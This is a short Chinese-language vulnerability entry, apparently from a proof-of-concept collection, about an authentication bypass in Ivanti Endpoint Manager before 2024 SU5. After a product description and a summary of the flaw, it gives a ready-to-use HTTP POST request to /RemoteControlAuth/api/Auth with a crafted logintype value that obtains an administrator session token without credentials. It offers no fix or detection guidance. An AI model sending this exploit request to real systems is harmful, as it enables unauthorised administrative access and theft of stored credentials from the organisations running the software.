Ivanti Endpoint Manager（前身为LANDesk Management Suite）是Ivanti公司推出的企业级端点管理解决方案，为大中型企业提供统一的IT资产管理、软件分发、补丁管理、远程控制和安全合规检查等核心功能。该产品广泛应用于金融、制造、医疗、政府等行业的IT基础设施管理，支持Windows、Linux、macOS等多种操作系统平台。Ivanti Endpoint Manager 2024 SU5之前的版本在 /RemoteControlAuth/api/Auth 接口存在认证绕过漏洞，由于访问控制不当，远程未认证攻击者可以通过构造特定的logintype参数值，无需凭据即可获取有效的管理员会话令牌，进而窃取系统中存储的敏感凭据信息。 POST /RemoteControlAuth/api/Auth HTTP/1.1 Host: Content-Type: application/json Content-Length: 45 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 Accept-Encoding: gzip Connection: close {"logintype":"64","username":"administrator"}

Ivanti Endpoint Manager